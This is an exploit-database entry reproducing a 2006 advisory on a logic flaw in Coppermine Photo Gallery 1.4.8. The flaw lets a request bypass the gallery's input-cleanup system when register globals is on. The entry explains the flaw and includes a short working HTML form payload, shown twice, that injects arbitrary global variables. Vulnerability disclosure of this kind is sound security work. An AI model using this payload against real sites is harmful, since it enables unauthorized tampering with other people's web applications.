Exploitalert - Database of Exploits

Coppermine 1.4.8~Parameter Cleanup System ByPass~Registering Global Varables

CVE	Category	Price	Severity
	CWE-264	Not specified	High

Author	Risk	Exploitation Type	Date
Not specified	High	Remote	2006-12-01

CVSS	EPSS	EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N	0.02192	0.50148

CVSS vector description

http://cxsecurity.com/ascii/WLB-2006110116

——————-Summary—————- Software: CPG Coppermine Photo Gallery Sowtware’s Web Site: http://coppermine.sourceforge.net/ Versions: 1.4.8.stable Class: Remote Status: Unpatched Exploit: Available Discovered by: imei addmimistrator Risk Level: High —————–Description————— Coppermine Photo Gallery has a logical design fault that will result to bypassing anti-XSS-Injection–RegGlobal-System. It is because that process of cleaning user suplied data checks that if we have any varable that exists in querystrings(or same)? If so it deletes that varable.Cause of this approach we can delete predefined varables(e.g _GET&_POST) that has defined arbitary varables before that it delete, and cleanup system will bypass with this trick. Imagine that Register globals is on. you request a url with this parameters in Mixed Get and Post Request: <form method=post action=”cpg/?MyVar=value”> <input name=_GET type=hidden> <input name=_REQUEST type=hidden> <input type=submit></form> It will append MyVar as a varable with arbitarry value before php scripts handles process{cause of register globals} and after that it give handle, predefined _GET&_REQUEST varables will delete. So our varable is unaccessable for checking and deleting but it exists in global area. Don’t forget that if you like to post some other standard parameters to program, you sould not use get after here.But e.g. use post. I mean that you inject your parameter with get array and pass standard parameters (e.g. pic number or page number) with post or so… BTW you sould just one of this arrays in one time. Cause of this bug you can create your own parameters that will attend after on source code. ————–See Also—————— {include/init.inc.php}40-101 /*cause of extra size of code I dont include them here*/ ————–Exploit———————- <form method=post action=”cpg/?MyVar=value”> <input name=_GET type=hidden> <input name=_REQUEST type=hidden> <input type=submit></form> ————–Conditions————– Register Globals Should Be ON ————–Credit———————– Discovered by: imei addmimistrator addmimistrator(4}gmail(O}com imei(4}Kapda(O}IR www.myimei.com myimei.com/security

Impressum